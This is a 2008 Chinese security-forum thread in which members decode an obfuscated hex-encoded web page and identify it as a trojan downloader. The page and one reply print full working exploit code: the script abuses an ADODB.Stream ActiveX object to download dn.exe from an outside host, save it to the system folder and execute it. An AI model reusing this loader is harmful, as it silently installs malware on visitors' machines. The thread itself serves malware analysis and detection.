查看: 2245|回复: 7
收起左侧

[已鉴定] 会解密网址的来

 关闭 [复制链接]
250662772
发表于 2008-12-2 16:46:48 | 显示全部楼层 |阅读模式
这种实在解不出了,有知道怎么解的方法吗?


<html>
<body>
<script language="JavaScript">
function mymid(ss) {
return ss.substring(2);}
</script>
<script language="VBScript">
s="js"
flag_type=s
S="66756e6374696F6e20676e286e29200d0a7B200D0A766172206E756d626572203D204d6"
S=S+"174682E72616e646f6D28292A6E3B2072657475726e20277E746D70272b4D6174682E72"
S=S+"6f756E64286E756D626572292B272e657865273B200d0a7D200D0a6C6A3d22687474703"
S=S+"a2f2F7777772e376b66696c652e636E2F646e2f646E2e657865223b0D0A747279200D0a"
S=S+"7b206161613D226F223B0d0a6262623D22626A65223B0D0A7979793d226374223b0D0A6"
S=S+"363633d2241646F64223B0d0A6464643d22622e53747265616D223B0d0A6565653d224d"
S=S+"6963726F736F66742e584d4C485454222B2250223B0D0a6767673d226f223B0d0A6B6B6"
S=S+"B3D2270223b0D0a6d6d6D3d2265223B0D0A7373733D226e223B0d0A7661722064663d64"
S=S+"6F63756d656e742e637265617465456c656D656e74286161612B6262622B797979293B2"
S=S+"00d0a64662E7365744174747269627574652822636c6173736964222C22636C7369643A"
S=S+"42443936433535362d363541332d313144302D393833412d30304330344643323945333"
S=S+"622293B200d0a76617220783d64662E4372656174654F626a656374286565652C222229"
S=S+"3B200D0A76617220533d64662e4372656174654F626A656374286363632b6464642C222"
S=S+"2293B200d0A532E747970653D313b200D0a782e6F70656e2822474554222C206c6a2C30"
S=S+"293B0d0A782E73656e6428293b200d0a6D7A313D676e283130303030293B200D0a76617"
S=S+"220463d64662E4372656174654F626A6563742822536372697074696E672e46696C6553"
S=S+"797374656d4F626A656374222c2222293B200d0a76617220746D703D462E47657453706"
S=S+"56369616C466f6C6465722830293B206D7A313d20462e4275696C645061746828746d70"
S=S+"2C6D7a31293b200D0A532E4F70656E28293B0d0a7474743d782e726573706F6e7365426"
S=S+"F64793B0D0a532E577269746528747474293B200d0a693D323B0D0a532E53617665546F"
S=S+"46696c65286d7A312C69293b20532e436C6F736528293b200D0A76617220513d64662e4"
S=S+"372656174654f626a65637428225368656c6C2E4170706c69636174696f6E222c222229"
S=S+"3b200D0a657870313D462e4275696c645061746828746D702B275C5c737973272b27746"
S=S+"56d3332272c27636d642E65786527293B200d0a515b225368656C6c45222B2278656375"
S=S+"7465225d28657870312C27202f6320272B6d7A312c22222C6767672B6B6b6B2b6d6d6d2"
S=S+"b7373732C30293b200d0a7d206361746368286929207b20693D313b207D200d0a"
D=""
DO WHILE LEN(S)>1
    k="&H"
    k=k+ucase(LEFT(S,2))
    p=CLng(k)
    m=chr(p)
    D=D&m
    S=mymid(S)
LOOP
if flag_type="html" then
  document.write(D)
end if
if flag_type="vbs" then
  EXECUTE D
end if
</script>
<script language="javaScript">
if (flag_type=="js") {
var e;
try
{
eval(D);
}
catch(e){}
}
</script>
</body>
</html>
glacier_lk
发表于 2008-12-2 16:59:26 | 显示全部楼层
直接复制到我的解密页面然后点击连续十六进制解密1即可得到解密后的代码。。。
解密页面(测试版):http://glacierlk.cn/openlab/jm.htm
function gn(n)
{
var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe';
}
lj="http://www.7kfile.cn/dn/dn.exe";
try
{ aaa="o";
bbb="bje";
yyy="ct";
ccc="Adod";
ddd="b.Stream";
eee="Microsoft.XMLHTT"+"P";
ggg="o";
kkk="p";
mmm="e";
sss="n";
var df=document.createElement(aaa+bbb+yyy);
df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var x=df.CreateObject(eee,"");
var S=df.CreateObject(ccc+ddd,"");
S.type=1;
x.open("GET", lj,0);
x.send();
mz1=gn(10000);
var F=df.CreateObject("Scripting.FileSystemObject","");
var tmp=F.GetSpecialFolder(0); mz1= F.BuildPath(tmp,mz1);
S.Open();
ttt=x.responseBody;
S.Write(ttt);
i=2;
S.SaveToFile(mz1,i); S.Close();
var Q=df.CreateObject("Shell.Application","");
exp1=F.BuildPath(tmp+'\\sys'+'tem32','cmd.exe');
Q["ShellE"+"xecute"](exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0);
} catch(i) { i=1; }
shmily512099
发表于 2008-12-2 17:04:31 | 显示全部楼层
shmily512099
发表于 2008-12-2 17:06:30 | 显示全部楼层
木马名称:Trojan-Downloader.Win32.Delf.pft

程序:
F:\TEMPORARY INTERNET FILES\CONTENT.IE5\CH2R81EF\DN[1].EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?
Palkia
发表于 2008-12-2 18:20:05 | 显示全部楼层

to kl

2008-12-2 18:20:04        检测到威胁: HEUR:Trojan.Win32.Invader        C:\Documents and Settings\Administrator\桌面\dn.exe
qianwenxiang
发表于 2008-12-2 18:22:45 | 显示全部楼层
1.png
雨宫优子
发表于 2008-12-2 18:25:13 | 显示全部楼层
其实很简单

这其实是HexAscii加密

论坛上有人发过解密工具..

如果不用解密工具也很简单

把eval(D);换成document.write("<xmp>"+D+"</xmp>")

在沙盘执行即可获得代码

更简单的就是把eval换成alert...
leonfg
发表于 2008-12-2 23:42:13 | 显示全部楼层
2008-12-02 23:41:46        HTTP filter        file        http://www.7kfile.cn/dn/dn.exe        probably a variant of Win32/TrojanDownloader.Delf.NJH trojan        connection terminated - quarantined        CHINESE-GUNDAM\GUNDAM        Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 15:12 , Processed in 0.125528 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表